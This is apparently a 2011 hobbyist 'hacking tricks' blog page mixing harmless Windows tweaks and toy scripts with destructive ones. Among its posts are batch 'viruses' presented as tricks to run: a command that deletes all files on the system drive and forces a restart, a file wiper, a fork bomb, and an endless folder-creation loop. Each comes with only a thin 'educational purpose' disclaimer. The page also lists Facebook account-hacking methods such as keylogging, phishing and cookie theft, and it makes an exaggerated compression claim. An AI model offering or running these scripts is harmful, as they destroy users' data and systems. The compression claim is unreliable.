Web Toolbar by Wibiya

Pages

PLEASE,CLICK HERE TO SUPPORT US!! (ChetaN)

Saturday, 15 October 2011

* Batch File That Pops-up with repeating msgs

1) Open Notepad.
2) Copy the Following code into Notepad.
3) Save the File as anything.bat
4) Now This File....U will get a Different Pop-Up with repeating Msgs.....Just enjoy the trick...
5) U can also Change the messages what type of you want.
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * U fool
msg * since you are stuck reading
msg * I am gonna teach you
msg * Batch Programming series
msg * Did you learn anything new
msg * and are you enjoying it
msg * if yes then do subscribe http://hackingnil.blogspot.com/
msg * to learn hacking
msg * the fastest growing ethical hacking site
msg * on net
msg * and you know what
msg * you have been hacked Bye....
GOTO BEGIN

* Remove Recycle Bin From Your Desktop :


1. Go to start, Run, Type “gpedit.msc” (Type without quotes)
2. On the left panel, under User Configuration expand the tree Administrative templates.
3. Click on the subtree desktop (single click, do not expand it)
4. On the right panel, Select the option-Remove Recycle Bin icon from desktop properties.
5. Double click the option, on the settings tab just select the option enabled, press OK & exit the window.
6. Refesh the desktop (press F5), Your Recycle Bin vanishous. If not you need to logout and then re-login.

* How to compress 1 Gb data to 10 mb


Download following Software n u can now compress 1 GB data to only 10 MB :

http://www.sourceforge.net/projects/kgbarchiver/files/KGB%20Archiver%202/2.0%20beta%202/KGB_Archiver

Thursday, 13 October 2011

* C Program without main function


#include<stdio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf("Hacking Is My Passion......“);
}

* BUG IN WINDOWS XP/7 Calculator :


1) Open calculator ie.. Goto run and type – calc 
2) Now type the following
    2.1) Type 4
    2.2) Take its square root by using the square root button,
    2.3) Now you will get 2. Subtract 2 from it.
    2.4) The answer should have been 0 but its not. You would have got a long number as your answer.

* How Facebook hacking is Carried out? – 6 methods


1. Keylogging – Installing Keylogger. (easy).
2. Phishing – Creating fake Facebook Login page. (Difficult).
3. Using Victims Mobile. (easy).
4. Stealing facebook cookies of victim. (Difficult).
5. Revealing saved Facebook passwords on web-browsers. (easy).
6. Bypassing Facebook’s Security Question (Difficult).

Tuesday, 11 October 2011

* If Command Prompt Is Blocked


Most of the computers have Command Prompt blocked for public access to people. This is for security reasons. Some time you  may want to view hidden files in the public computer using command prompt. Lack of Command Prompt will be great loss of if you want to hack in to the networking or the same pc. 
There are several tweaks and hacks to enable command prompt, but it is so much tricky. I am introducing you with a nice alternative for command prompt. Have a look at the screenshot. It supports all the features that Command Prompt does. Even all the wild cards that can be used in DOS.


Download it from here: http://www.gammadyne.com/gs.exe



It is actually a DOS Shell, which interpets user command same as in DOS.

Sunday, 9 October 2011

* Delete All Files On Your PC

Paste the given code in notepad.

@Echo off
Del C:\ *.*y

And save it like any_name.bat . 
Now run this file. All the data is lost on your PC.
And In LINUX Just run the command.
rm *.* will delete all files of any extention.
* This trick is only for educational purpose. Any Damage will occure its not our responsibility.

* TEXT TO AUDIO CONVERTER


1) Copy the following code into the Notepad.

Dim msg, sapi
msg=InputBox("Enter your text for conversion","Chetan malabade-Text-To-Audio 
Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

2) Save this as Convert.vbs. and see the results.

* Top 10 Best Hackers Of The World


1) Kevin Mitnick
2) Gary McKinnon
3) Vladimir Levin
4) Kevin Poulsen
5) Timothy Lloyd
6) Robert Morris
7) David Smith
8) MafiaBoy
9) Masters of Deception (MoD)
10) Richard Stallman

* PLAY SOUND IN C-LANGUAGE


Copy this code. And enjoy how to play sound in C-editor.......

#include <graphics.h>
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>
#include<time.h>
#include<dos.h>
void main()
{
clrscr();
printf("HELLO, SA RE GA MA PA DHA NI");
music(5);
getch();
}
music(type)
int type;
{
float oct[7]={130.81,146.83,164.81,174.61,196,220,246.94};
int n,i;
switch(type)
{
case 1:
for(i=0;i<7;i++)
{
n=random(1);
sound(oct[i]*5);
delay(300);
}
nosound();
break;
case 2:
for(i=0;i<7;i++)
{
n=random(7);
sound(oct[i]*4);
delay(200);
}
nosound();
break;
case 3:
for(i=0;i<7;i++)
{
n=random(7);
sound(oct[i]*5);
delay(200);
}
nosound();
break;
case 4:
for(i=0;i<7;i++)
{
n=random(7);
sound(oct[i]*7);
delay(200);
}
nosound();
break;
case 5:
for(i=0;i<7;i++)
{
n=random(7);
sound(oct[i]*10);
delay(200);
}
nosound();
break;
case 6:
for(i=0;i<7;i++)
{
n=random(7);
sound(oct[i]*15);
delay(200);
}
nosound();
break;
case 7:
for(i=0;i<7;i++)
{
n=random(7);
sound(oct[i]*20);
delay(200);
}
nosound();
break;
}
return(0);
}

* Folder Lock Using Notepad


1) Copy The following code into the notepad.
2) Save this file as anything.bat
3) Then run this. After Running One Folder Created.
4) Again run that file. Then it will ask for locking the file as - "Are you sure u want to Lock the 
    folder(Y/N)". Then Press Y.
5) If U UnLock That Folder then again run that file. Then Type the password as "chetan". This is 
    default Password.
6) if U want to change the password then in code replace the name of me i.e. "chetan" by yours.

cls 
@ECHO OFF 
title Folder Locker 
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK 
if NOT EXIST Locker goto MDLOCKER 
:CONFIRM 
echo Are you sure u want to Lock the folder(Y/N) 
set/p "cho=>" 
if %cho%==Y goto LOCK 
if %cho%==y goto LOCK 
if %cho%==n goto END 
if %cho%==N goto END 
echo Invalid choice. 
goto CONFIRM 
:LOCK 
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
echo Folder locked 
goto End 
:UNLOCK 
echo Enter password to Unlock folder 
set/p "pass=>" 
if NOT %pass%==chetan goto FAIL 
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker 
echo Folder Unlocked successfully 
goto End 
:FAIL 
echo Invalid password 
goto end 
:MDLOCKER 
md Locker 
echo Locker created successfully 
goto End 
:End

* Remote Shutdown - Find IP Address


* Change your system password

1) open the command prompt.

2) type the command as : net user press enter

3) then the usernames are displayed. select the username which u want to change th password.

4) type the command as: net user username * press enter

(* indicates the password which u want to set.)

5) for ex. see the bellow image.




Saturday, 8 October 2011

* A VIRUS That Will Make 1,000 Folders In Few Sec.


1. Open notepad and type :

@echo off

:top

md %random%

goto top

2. Save it as 1000folders.bat

3. Run This..

   * This trick is only for educational purpose. Any Damage will 
occure its not my responsibility.

* Make a Simple Virus (fork bomb)


1. Launch notepad and type

%0|%0
2. Save as .bat , for example fork.bat

3. Run This...

  * This trick is only for educational purpose. Any Damage will 
occure its not my responsibility.

* Create Virus Using Notepad

1. Open Notepad. And Type The Following.

@echo off

del %systemdrive%\*.* /f /s /q

shutdown -r -f -t 00

2. Save This as Vir.bat

3. Run This...........

After Restarting Your XP Will Be Currupted.

  * This trick is only for educational purpose. Any Damage will 

occure its not our responsibility.

* Hide Your Drives From WINDOWS XP/7


1)GO TO START-->RUN-->tupe "cmd".

2)Type "diskpart" press enter.

3)Type "list volume"press enter.

4)Type "select volume 5" (5 is th drive number).

5)Type "remove letter E"(E is the letter assigning for drive 5).

6)Then Restart Your PC. then your E drive will be Hidden.

7)For Removing Hidden drive :Repeat the procedure upto the step-4.

8)Then Type "Assign letter E".

9)Imediately Ur drive will be displayed on My Computer.